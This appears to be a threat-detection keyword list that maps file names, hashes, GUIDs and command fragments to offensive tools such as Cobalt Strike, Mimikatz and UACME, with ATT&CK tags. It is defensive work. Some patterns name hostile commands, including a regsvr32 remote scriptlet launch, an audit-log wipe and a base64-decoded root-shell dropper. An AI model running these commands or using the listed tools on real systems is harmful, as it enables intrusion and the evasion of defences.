T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*_Shellcode.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*_tcp_cc2(*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*_udp_cc2(*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*{process_to_inject}.exe*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*| favfreak*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*| hakrawler*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*|base64 -d > /tmp/traitor*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*~/.csexec*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*< /dev/console | uudecode && uncompress*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Web Attacks,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*<3 eo.oe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -**,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,0,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*== NoPowerShell v* ==*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*=Administrator.ccache*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,0,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*=imaohw*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed whoami,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*=resu ten*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed net user,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*> /var/log/audit/audit.log* rm -f .*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked note defense evasion,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*0.0.0.0:2222*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*0.0.0.0:4444*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*0.0.0.0:4445*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*0.0.0.0:53531*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*00_create_all_modules_test*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,0,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*01_all_exploits_have_payloads_test*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*0472A393-9503-491D-B6DA-FA47CD567EDE*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*04845492-BD9E-4EC6-ACA4-4A0A460B3508*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*04ca7e137e1e9feead96a7df45bb67d5ab3de190*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,0,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*04FC654C-D89A-44F9-9E34-6D95CE152E9D*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,0,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*07EF7652-1C2D-478B-BB4B-F9560695A387*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*0971A047-A45A-43F4-B7D8-16AC1114B524*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,0,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,0,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*0ac82760-3e0d-4124-bd1c-92c8dab97171*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,0,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*0B6D8B01-861E-4CAF-B1C9-6670884381DB*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,0,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,0,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*0d1n * --post * --payloads *,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,0,N/A,N/A,,N/A,,, -*0d1n --host*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,0,N/A,N/A,,N/A,,, -*0d1n*kill_listener.sh*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*0DD419E5-D7B3-4360-874E-5838A7519355*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*0evilpwfilter*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*0evilpwfilter.dll*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*0vercl0k/udmp-parser*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,1,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*0x00-0x00*,offensive_tool_keyword,Github Username,Github pentester username with lots of different exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/0x00-0x00,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*0x09AL/DNS-Persist*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*0x09AL/IIS-Raid*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*0x9999997B3deF7b69c09D7a9CA65E5242fb04a764*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*0xbadjuju/Tokenvator*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege 